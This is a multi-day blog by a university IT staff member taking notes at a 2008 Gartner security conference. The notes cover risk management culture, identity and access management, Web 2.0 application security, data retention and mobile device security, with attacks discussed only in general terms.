Thursday, 2 October 2008

Magic Quadrant and the Colour of Security

This post combines feedback from the last two sessions of the conference. The first session was an explanation of the famous Gartner "Magic Quadrant", and during this session they exploded a few myths.

Magic Quadrants

Every vendor in the diagram is a worthy alternative—it depends on what you need from the product. If you have a niche need, then a niche product may be perfectly appropriate; but don't expect that you can make a purchase decision by just looking at the diagram; furthermore, don't expect to make a decision based on looking at the diagram and reading the analysis. Instead, look at the diagram, read the analysis and then speak to an analyst—through that last process, the analyst will sometimes suggest vendors that didn't meet the criteria for inclusion in the report but are more appropriate to us than the vendors listed.

Magic quadrant diagrams are only produced for markets that have reached a certain maturity, so the inclusion of a vendor on the diagram should give us an indication not only of their place in the market, but the maturity of the market altogether. Sometimes, magic quadrant reports get combined over time as markets become less siloed and products more integrated. We need to keep an eye on acquisitions ourselves, as diagrams are not updated especially to reflect events—only yearly on a schedule.

The Colour of Security

This session took the form of a panel discussion which asked two questions:

  1. Will business systems be more or less secure in ten years time?
  2. Will there be a separate IT security function in ten years or will it have become wholly integrated into IT operations?


 

Separate IT Security Function


 

Perpetual Arms Race


 

Security Nirvana


 

No Security Function


 

Chaos


 

Software Engineering

 


 

Less Secure


 

More Secure


 

The above grid was revealed to us after the final vote. Clearly, the descriptions are for the extremes, whereas reality is likely to be less clear cut (when is reality ever clear cut?)

Perpetual Arms Race: if there remains a separate IT security organisation, more and more will move to IT operations (as they are seeing anti-virus and anti-malware moving now) but there will always be new threats to be mitigated in the future and IT security experts to mitigate them.

Chaos: if IT security organisations are operationalized and yet we are less secure, the world will descend into chaos (or at least towards chaos.

Security Nirvana: if IT security professionals maintain a separate function, but the world is more secure, then their world (and ours) will be a better place.

Software Engineering: If we end up more secure, yet there is no separate IT function, it is because we have solved the problems of IT security through software engineering.

When an American audience was asked to vote before the debates, they predicted a security nirvana; after the debate, they predicted an arms race. We, the European audience were able immediately to predict the arms race, and stuck with that prediction after the debate.

The arguments are these:

  1. IT security products are almost wholly reactive, so we will always be on the back foot—preparing for the most recently discovered hack, but never predicting the next one (and adequately defending against it).
  2. Ross Anderson (www.ross-anderson.com ) who spoke the previous day, indicated that security vulnerability in emerging technologies was virtually an economic certainty—only when markets mature, can vendors afford to get security right (look at Windows, look at the internet).
  3. Hackers are becoming professional, and are in it for the money, not the fame—that means that their priorities are different. TJ Maxxs (TK Maxxs to us) was breached months before they realised and it was even longer before their customers were told. This particular point kept me thinking—how many other institutions have been breached already and simply haven't found out yet…

Separate from my blog, I am developing a slide deck that I will post when it's ready highlighting my feedback from the conference.

Information Security Audits as an Accepted Business Support Tool at Novartis

Potemkin's villages are what you get when you announce information security audits, because people can't afford to be at the receiving end of "critical audit findings". "Audits are of little use for the management to steer a company and manage risks." No sustainability of audit preparation. People are threatened by audits, and don't see audits as risk management techniques.

  • Make the assessment selection process transparent
  • Make the conclusions transparent
  • Make it a shared decision and assessment process
  • Don't blame anybody for risks found in an assessment

Wednesday, 1 October 2008

Communities of Trust Case Studies

What we do is dependent on us being able to share data with people outside the organisation—how can we do that safely in a "community of trust"? What risks are introduced through the extended enterprise?

The greater the degree of separation, the greater the difficulty of evaluating risk. How willing is your organisation to accept risk from unmanaged PCs and non-employees?

Trust reduction factors:

  • Greater distance
  • Different organisations
  • Cultural diversity
  • Multiple jurisdictions
  • Incompatible technologies

The less you know about something, the riskier you must assume that it is.

A Community of Trust offers:

  • Assurance that you know with whom you are dealing
  • Confidence that information has not been manipulated
  • Expectation that sensitive information will not leak

Line of business decides how to use the technology that is provided by IT.

Call to action:

  • Re-evaluate your current outsourcing and partnering risks.
  • Move controls up the stack to application and data layers.
  • Put controls on endpoints where the data is used.
  • Use discretionary controls and logging and move towards mandatory controls—ultimately, automated controls.

SANS Institute Workshop: Frontline Solutions for Security Professionals

This is a longer session that all the others, and I hope will take us to a greater depth of understanding of some of the issues. The speaker is a trainer by profession, so the flavour of this posting might be different than the others. Again, SQL injection and Cross-site scripting are the two most common attacks.

The talk was longer than it needed to be (ah well) and covered much of the same ground as the other talk by the same presenter. However, he did give a demonstration of a SQL injection attack used to get passed a bank's credential logon screen, as well as a hacker's toolkit product that he recommended we use to determine what vulnerabilities our own systems might have against the black-hat use of the same techniques.


 

Security in the Age of Web 2.0

You will be exposed to Web 2.0 insecurities, no matter what.

Web 2.0: User-Centric (user as developer); distributed; open (and open source); lightweight (user friendly)

  • What makes Web 2.0 applications insecure?
  • What technologies and practices will secure Web 2.0?

Ajax, LAMP, SOAP: Lightweight. It is not the webmaster that selects content, no project manager, no network administrator, no DBA, no business analyst defining the taxonomy. Results are risky for us, and for banks, businesses…

Availability of resources—those resources that we can use to analyse our applications (SAST and DAST) can be used by attackers as well (which means it is even more important that we use them).

Openness and collaborations as a threat—deep linking, Mashups, RSS, iFrames—these things are a threat to advertising revenues (as it is main web pages that contain the advertising.

SOA as a threat—reusable services==reusable security vulnerabilities. WSDL and UDDI disclose information to hackers. Legacies in SOA are exposed to new (web) types of attacks.

SWOT for Web 2.0 Application Security

Strengths

  • Good-enough technology
  • Increasing awareness
  • Pressure from Government and regulators

Weaknesses

  • Users less mature than tools
  • No developers responsibility
  • Misconceptions about:
    • Inward facing apps
    • Role of QA separate from security assurance
    • Network security is no replacement for defence in depth

Threats

  • Dual purpose technologies
  • Changing nature of attacks (from massive to targeted)
  • Hackers industry
  • Extreme openness, collaboration

Opportunities

  • Security solutions span over application lifecycle
  • Security built into applications
  • Evolution towards Security 3.0 (application security, separate from network security)


Recommends tactical acquisition of DAST and SAST—these technologies are not likely to disappear. Check out the slide deck for the hype curve and list of vendors for DAST and SAST. Need to look into monitors and scanners for DBMS, network and application.

Do Software Composition Analysis—validate the IP of components; validate the security/functionality of patches; validate releases. Black Duck and Palamida are the vendors.

Mashups: Validate all input; examine license compliance; filter content presented to customers; formalize SLAs with third parties; expect abuse in unpredictable ways; prepare for HTML/XML screen scraping and iFrames.

Tuesday, 30 September 2008

Creating an Effective Security and Risk Management Culture

Superheroes are not here to prevent things from happening—we can't afford to be drawn to a superhero model with respect to security and risk management. The alternative is to have a mandate from the top and to earn the trust of the organisation as a whole.

The head of security must be:

  • Never considered an obstacle
  • Consulted by business
  • Someone who listens
  • Knows how the company makes money

Even better:

  • Considered an added value
  • Advice is sought out
  • Board/CEO reads report
  • Integral to IT planning

Must understand constraints on activity:

  • Regulations: External/Internal [effectiveness of rules is a function of organizational culture]
  • Cultural Proclivity [effectiveness of rules is a function of organizational culture]
  • Market Forces [if it affects the bottom line, it will automatically become a priority]
  • Technical Possibilities [functions in spite of control subject]

How many security officers does it take to make an enterprise secure? Just one… …but the enterprise must want to be secure. Awareness, Willingness, Ability. This is the natural logical progression as we bring up security awareness.

Can we come up with a form with the service catalog and get numbers for the level of confidentiality, integrity and availability they need for each of those systems? Need to make sure that data owners assess their own data criticality. Data owners explicitly accept associated risks.

Key message is that business owners own the risk, not us. They might delegate to us the actions to reduce risk, but we don't own the risk for them. Work with business owners to determine risks, and make sure they understand the residual risk that remains after we have performed agreed actions.

Sales Pitches

I have blogged something about some of the cendors at the conference, ut put it on my Sharepoint blog for the sake of security...
http://cis-netsps03.lancs.ac.uk:28921/personal/meikle/Blog/default.aspx

The Future of Database Security

Hmmm… Too much that is relevant here, so my comments going into e-mail. Drop me a line if you want to know what my thoughts were.

The Identity and Access Management Scenario

Note: there is a separate Identity and Access Management Summit.

A set of processes and technologies to manage:

  • Users' digital identities
  • The relationship to civil identity
  • Users' access to systems and the information they contain

Identity: user lifecycle management. Access model: role life cycle management. Identity lifecycle consumes roles from access model. Workflow that passes roles to user lifecycle has a lifecycle itself. All this is done to reduce risk (how does the security framework affect the workflows).

Security efficiency; security effectiveness; business enablement.

Interesting that, when talking about the value of IAM, the first thing the speaker mentioned was attracting and retaining customers—that is exactly what we're doing when we use UIM to help with PGA.

Value:

  • Attract and retain customers
  • Improve critical business processes and workflows
  • Maximise performance and profitability

IAM Program Maturity

Non-existent

Initial

Developing

Defined

Managed

Optimizing

4%

10%

40%

28%

15%

4%


 

Does indicate the importance of process definition before applying IAM to that process. We need to work out what process definition we need to do for students during the registration process (and during the application process) to give them the access they need.

Controlling Unauthorized Network Access in a Large Organization

Deploying NAC at Nottingham City Council, with Sophos. Chose Sophos because they already had their AV. Interesting that yesterday, we were encouraged to push back on the cost of AV, and threaten to pull out our existing AV if we don't get a cut in price.

Very little detail in this presentation. Does remind me that NAC is not an enforcement technology. The questions from the audience reflect the issues of NAC for: a variety of roles (visitors, parent companies etc); multiple platforms (LINUX and Mac not supported by Sophos).

Protecting Business in a Web 2.0 World

Signature approach to malware is running out of steam, so what should replace that paradigm? Massive increase in the number of unique samples of malware. There are programs now that generate malware (so there are many variants).

Mmmm. This has turned into a brief history of SaaS and a sales pitch for security SaaS…

Managing Legacy Content to Decrease IT Costs and Reduce Business Risks

If our default, as we look at our e-mail is "I'll keep it just in case." Keeping everything is expensive and most of what we keep we don't need to. Data storage needs are going up about 50% per year (without taking into account pictures, audio and video). No one has responsibility for information retention management. How do we manage the costs of undisciplined data retention. Retention schedules cannot be implemented (because no one has the responsibility).

Suggestions:

  • Give legal training to IT people so that they can argue with the lawyers over what can be thrown away
  • Hire data archivists (directly, not as consultants)—who can make decisions about what to save and what to keep

Information value degrades over time—rarely does it maintain value. After the first month of e-mail archiving, archives are rarely hit. There are certain things that you should keep—but it is the exception, not the rule.

Five Myths about Rising Storage Demand:

  1. It can be offset by better technology
  2. It can be offset by paying less
  3. It can be offset with more storage tiers
  4. It can be satisfied with more tape
  5. It can be accommodated with archiving software

Determine TCO for storage and react.

Use automated methods to determine what files can be thrown away. Determine a set of rules that can help build a list of what could be thrown away.

How does this stuff affect us? For students, I assume that people's home directories aren't kept in perpetuity. For their submissions, how long do they need to be kept—do we want to keep them forever? For e-mail, for staff H: drives, we need to work out what can be stored forever and what can't. What's worse: not giving people lots of central storage so that things get lost on C: drives, or giving them lots of central storage and having capacity requirements go up and up…?

Monday, 29 September 2008

Latest Trends in Computer Hacking

This presentation is given by Jess Garcia, of SANS.

Hacking activities have changed over the last three years or so.

  • Dec-07—Sophiticated Trojan loots business bank accounts.
  • Jan-08—Bank Trojan charges for sex, breaks two factor authentication.

Botnets are being used differently now—they are the basis for more than just Denial of service attacks.

Hackers now attacking the security software itself and then obfuscate what has happened.

Another reason why we should patch immediately—85% of the time now, there are exploits released the same day as patches for vulnerabilities. That's up from 18% in 2004. No longer are the attackers teenager computer experts, now they are professional cyber-criminals (hired by criminal gangs—or, if they are teenagers, they have been kidnapped by the gangs and threatened). Rather than being motivated by prestige and curiosity, they are motivated by money.

Top Threats 2008:

  • Client side: Browser Plugin Attacks
  • Web Apps (51% of all vulnerabilities): SQL Injection and cross-site scripting
  • Virtualization—this seems to be a growing area
  • Malware
    • Trojan Bankers
    • Botnets

Haydan is a tool that can be used to create payload with the desired MD5 hash… so much harder to trust hashes.

Malice, Misuse or Mistake: Getting to the "root" of the problem

This presentation seemed to suffer the same issue that I saw in vendor presentations in Barcelona—everything seemed to revolve around selling rather than imparting information—the speaker's motivation was different. Little to say really other than we should try to follow the principle of least privilege—but nothing about how much harder that might be as we try to breakdown data silos and provide new views on data across multiple databases—no strategies for managing those new problems… ah well.

Security of Big Applications, Legacies, Databases and Vendors

There is a key need for: Dynamic Analysis Security Testing and Static Analysis Security Testing. They will help us to ensure that the applications we buy or develop are secure. I had my 1-on-1 with the speaker at lunchtime. He suggests that we should be asking vendors what kinds of analysis they have performed on their code. We should expect that the applications we use in conjunction with code development are deeply integrated with Visual Studio.

There is a growing body of threats to database applications, via their web interfaces. We should look at data obfuscation technologies to help us with testing and if we have vendors asking us to send them databases for debugging (something we won't do now). Vendors: Applimation, DCR, Compuware, Camouflage, IBM, Oracle.

"Legacy application is any application that really works." i.e., as soon as an application goes live, it is legacy. As soon as we take our eye off the ball, we're not working on an application, it becomes legacy. Legacy understanding is key to legacy security. Use dynamic and static analysis to collect information on legacy, and determine what needs to be done to secure our legacy systems.

Consider a quadrant picture with two axes: application business value against application technical quality.

Increasing

Application technical quality

Tolerate

(Re-evaluate/reposition)

Integrate

(maintain/evolve)

 

Eliminate

(Retire/Consolidate)

Migrate

(Modernize/re-engineer)

 

Application business value ->

(successful attack, is low harm)

Increasing

(successful attack is high harm


 


Open Source SAST and DAST technologies are being used by hackers to determine vulnerabilities in applications. They can then use the vulnerabilities that they find to hack those applications. We need to ensure we understand what the hackers understand about our applications.

We should be using tools through all phases of application development to ensure we develop secure applications. Need to look at the speaker's Gartner publications for more direction.

DNS

Spent some time over lunch talking to DNS. We discussed Self-Service Password Reset (SSPR). They indicated the following:

  1. If you get password convergence, the use of SSPR reduces, as people have only one password to remember
  2. People feel a stronger ownership of their password when they have only one (it is their password, not the Windows password or the e-mail password or VLE password). That stronger ownership leads to them keeping their password more secure.
  3. When there is password convergence, people are less likely to share their password, as that password gives access to their e-mail.
  4. They have implemented SSPR but use up to twelve questions to identify someone, and let the end-user determine the questions that they would be asked. They do not recommend we try that in the university as they would probably go with "Q1", "Q2" for the questions and "yes" for all the answers.

The Mark One Human Being

Recent security breaches:

  • Nationwide fined £980,000 for stolen laptop.
  • HMRC lost two CDs of child support data
  • Bank customer data sold on eBay
  • Secret terror file left on train
  • Royal Navy laptop stolen with 600,000 people's details…

66% of companies increased IT security spending in 2007, but still these events continue.

40% provide ongoing security awareness training to staff—i.e. 60% do not.

If we don't teach people what they need to know about security, we will not be able to make the university's data more secure. We need to make security education and awareness a key part of our information security strategy. It is not enough to tell people that security is their responsibility. Consider how we market information security awareness to ensure that the message gets across.

Once the communication is out, measure whether there is a change in behaviour. Policy compliance, and survey results are used to inform the following year's approach.

If we put the technology in place, but do not market and communicate the programme, so that individuals understand and fulfil their responsibilities, the investments wwe make will be worthless and security breaches will happen—meanwhile our support for investment in security will wane.

Conference Opening and Building a Real-Time Adaptive Security Infrastructure

Speakers: Jay Heiser; Tom Scholtz; Neil MacDonald.

Coming up later this week:

  • Ross Anderson—professor of Security Engineering, University of Cambridge Computer Laboratory--speaks tomorrow and has written a book called "Security Engineering".
  • Peter Hustinx, European Data Protection Supervisor—strategic issues for data protection in Europe.
  • Best practice workshops: SANS; ISACA.

Adaptive Security Infrastructure; Neil MacDonald discussing how information security must become adaptive. Adaptive to changing threats and to changing business needs. At the moment, information security is not keeping up; too many point products, with too much complexity; products are too expensive and vendors are not investing enough. Network, endpoint, application and content security all separate and don't talk to each other. We need to switch from "zero risk" to "managed risk".

Implications for security as we virtualize hardware, operating system and applications; data from applications is abstracted through web services. Then there are portable personalities, EC2 (Amazon) etc etc...

The current model is flawed: there is no "us" and "them". Every device, every packet, all content, every user is a risk. Implication is that the notion of the "perimeter" is less important; security and trust are no longer binary; we need to think about the "relative trustability". Rather than just one "perimeter" there will be multiple. Look to survival of the system: protect workloads and information, not endpoints.


At the bottom, firewalls, application control. In the middle, anti-virus, anti spam, URL filtering. At the top, looking at behaviour. The layers communicate with each other.

Service Mark-up Language is going to be used to build security models (amongst other things) at the point that applications are written (will be announced by Microsoft at TechEd as project "Oslo"). Seems like the next generation of Dynamic Systems Initiative. The model describes the role(s) that should be able to perform particular functions within the application.

Mobility and Security Management Cycle

Security requires management, management requires security.

Cycle: Manage-Secure-Defend-Budget-Specify-Configure

  • How does mobility affect the challenge of management and security?
  • What are the key implementation decisions to security and management?

Management becomes more difficult when personal devices must be managed and secured (makes me think of devices bought by departments and faculties.

Platforms each require infrastructure for security and management: Blackberry, Windows Mobile, PC, personal PC, Nokia… But if we restrict platform support, people forward mail from managed device to personal account—then what happens to the security?

Recommendations: apply security policy at the point that a device is provisioned. Change management should check whether the device is within compliance. As issues are solved, move them out of the responsibilities of the security group—those problems are solved, and the security group needs to look constantly to the future. Network access control; VPN; patch management; local data encryption; port/peripheral usage control; firewall; anti-spyware; anti-virus. For us, many of these things are rightly handled by "operations"—but maybe we need to look to the others.

  • What are the inherent weaknesses of the device?
  • What default measures will strengthen device security?
  • What exposures are caused by the way the device is used?
  • What security measures and user practices will reduce exposure?
  • Can the device configuration be monitored or controlled?
  • Will good management reduce operations and support costs as well as improve security?

Consider that all the above questions need to be asked for each type of device that we use…

We may be at odds with users' requirements to ensure security. It is interesting that the speaker says that we don't have time to evaluate windows updates before we apply them—we should just accept the risk of deploying straight away. Not worth using EFS unless you follow best practices—otherwise it is too easy to break. Encryption and strong authentication much better than remote lockdown/erase for mobile devices.

Securing wifi is to be a big problem moving forward—too many different kinds of devices.

  • Trusted devices: corporate-issued, fully controlled (ISS managed PCs)
  • Tolerated device: limited to safe interactions
  • Unwanted devices: uncontrolled, unmanaged

Speaker used this grid to show that there is a landscape of issues, and that we must look to converge on solutions that cover multiple areas of the grid—though there are different strategies for doing that. I think that we would benefit from looking to build a list of devices appropriate to the institution and determine how we are approaching the different areas of concern versus how we ought to approach them.

 

Encryption

lock/ wipe

backup/ restore

Inventory & audit

patch update

software distribution

anti-malware

VPN

user Auth

Company Desktop

         

Company notebook

         

Windows Mobile

         

Contractor PC

         

Employee notebook

         

Portable personality

         

iPhone

         

Blackberry

         


 


 

Sunday, 28 September 2008

Introduction

I am attending Gartner's Security Summit in London at the Royal Lancaster Hotel. This blog will contain my notes from the various sessions I will attend.

The first session is early on Monday morning--the music is the same as at the last Gartner event I attended--May in Barcelona... Look forward to my session notes.